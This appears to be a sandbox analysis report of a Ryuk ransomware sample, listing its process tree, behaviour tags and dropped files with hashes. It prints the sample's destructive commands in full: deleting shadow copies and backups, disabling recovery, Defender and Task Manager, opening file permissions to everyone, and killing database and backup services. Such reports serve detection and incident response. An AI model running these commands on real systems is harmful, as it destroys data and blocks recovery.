C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog22⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit2⤵
-
C:\Windows\system32\cmd.execmd.exe /c "C:\ProgramData\RyukReadMe.txt "3⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt4⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet2⤵
-
C:\Windows\system32\cmd.execmd.exe /c vssadmin Delete Shadows /All /Quiet3⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete2⤵
-
C:\Windows\system32\cmd.execmd.exe /c wmic shadowcopy delete3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures2⤵
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} boostatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no2⤵
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} recoveryenabled no3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/2⤵
-
C:\Windows\system32\cmd.execmd.exe /c wbadmin delete catalog -quiet/3⤵
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet/4⤵
- Deletes backup catalog
- Drops file in Windows directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop avpsus /y2⤵
-
C:\Windows\system32\net.exenet stop avpsus /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\system32\net.exenet stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop mfewc /y2⤵
-
C:\Windows\system32\net.exenet stop mfewc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y2⤵
-
C:\Windows\system32\net.exenet stop BMR Boot Service /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\system32\net.exenet stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY start=disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY$ECWDB2 start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLWriter start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SstpSvc start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mspub.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del %02⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s hrmlog22⤵
-
C:\Windows\system32\attrib.exeattrib +h +s hrmlog23⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog22⤵
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\hrmlog23⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\RYUKIDFilesize
8B
MD53d1b99acb27c0126675e74e0d860c057
SHA1ec8fcf47774cb63cc44d042a12c961cce03933a4
SHA2564ed2c30286b41cdccfb75b2d3c6f269beb0293059620281668c844f1a8dafb53
SHA5126df19ab4a6489d167c196a02414779458825e7ffdec14bf6e2b65017e384e1b51cea6fdc1e73e1d59cb963aa9852ee4e245fb0d3bf9edc7ed95b432e632d5854
-
C:\ProgramData\RyukReadMe.txtFilesize
1KB
MD53cfd6ef3b2825aa6ce421e10604ff452
SHA17c7c75df4105d3b0d69d1e03220f4d24644a8bde
SHA25665adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d
SHA512d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc
-
C:\ProgramData\hrmlog1Filesize
2KB
MD5d32a13d2a39fd672ab06cda60eace717
SHA1ff8b3b93b6b8ac4f795e1a15540a37ee1a735c4e
SHA25618afefd504f2c1f816eeba9df00671009f9fc8f44915ae62c7dad214684af437
SHA512e89652d2d62092d0c4368a456c8f3ef37561f9f3128e2d9128230a098be75c79123f571ed621d3cae80134da1c37acaa6d0f1680de9bf97f87448c887b4161d7
-
C:\ProgramData\hrmlog1Filesize
2KB
MD5d32a13d2a39fd672ab06cda60eace717
SHA1ff8b3b93b6b8ac4f795e1a15540a37ee1a735c4e
SHA25618afefd504f2c1f816eeba9df00671009f9fc8f44915ae62c7dad214684af437
SHA512e89652d2d62092d0c4368a456c8f3ef37561f9f3128e2d9128230a098be75c79123f571ed621d3cae80134da1c37acaa6d0f1680de9bf97f87448c887b4161d7
-
C:\ProgramData\hrmlog2Filesize
292B
MD538eb014bc309be66dd2eb004f8fb6fb0
SHA1ad3c9ba4a5b75a7c8cbc6645c1595004ba3b37fe
SHA256d50632c488d04a8f55dbca1312c6d266a050e8fe0994e7a6cb8cc4e6b636c582
SHA51267a28dc58c1046dcc176919bb7e014beda652ba89806832ff951b0a69aec66b2f703ea015567312520f77141068fcd5a16a35d2007118cd33f0421403d081d03
-
C:\ProgramData\hrmlog2Filesize
292B
MD538eb014bc309be66dd2eb004f8fb6fb0
SHA1ad3c9ba4a5b75a7c8cbc6645c1595004ba3b37fe
SHA256d50632c488d04a8f55dbca1312c6d266a050e8fe0994e7a6cb8cc4e6b636c582
SHA51267a28dc58c1046dcc176919bb7e014beda652ba89806832ff951b0a69aec66b2f703ea015567312520f77141068fcd5a16a35d2007118cd33f0421403d081d03
-
C:\ProgramData\ryuk.exeFilesize
885KB
MD535194c73ff38dd6c3bed7c0efcff6826
SHA11a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA2565fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f
-
C:\Users\Admin\AppData\Local\Temp\RYUKIDFilesize
8B
MD53d1b99acb27c0126675e74e0d860c057
SHA1ec8fcf47774cb63cc44d042a12c961cce03933a4
SHA2564ed2c30286b41cdccfb75b2d3c6f269beb0293059620281668c844f1a8dafb53
SHA5126df19ab4a6489d167c196a02414779458825e7ffdec14bf6e2b65017e384e1b51cea6fdc1e73e1d59cb963aa9852ee4e245fb0d3bf9edc7ed95b432e632d5854
-
C:\Users\Admin\AppData\Local\Temp\hrmlog1Filesize
2KB
MD5d32a13d2a39fd672ab06cda60eace717
SHA1ff8b3b93b6b8ac4f795e1a15540a37ee1a735c4e
SHA25618afefd504f2c1f816eeba9df00671009f9fc8f44915ae62c7dad214684af437
SHA512e89652d2d62092d0c4368a456c8f3ef37561f9f3128e2d9128230a098be75c79123f571ed621d3cae80134da1c37acaa6d0f1680de9bf97f87448c887b4161d7
-
C:\Users\Admin\AppData\Local\Temp\hrmlog2Filesize
292B
MD538eb014bc309be66dd2eb004f8fb6fb0
SHA1ad3c9ba4a5b75a7c8cbc6645c1595004ba3b37fe
SHA256d50632c488d04a8f55dbca1312c6d266a050e8fe0994e7a6cb8cc4e6b636c582
SHA51267a28dc58c1046dcc176919bb7e014beda652ba89806832ff951b0a69aec66b2f703ea015567312520f77141068fcd5a16a35d2007118cd33f0421403d081d03
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exeFilesize
885KB
MD535194c73ff38dd6c3bed7c0efcff6826
SHA11a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA2565fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f
-
memory/116-185-0x0000000000000000-mapping.dmp
-
memory/1048-190-0x0000000000000000-mapping.dmp
-
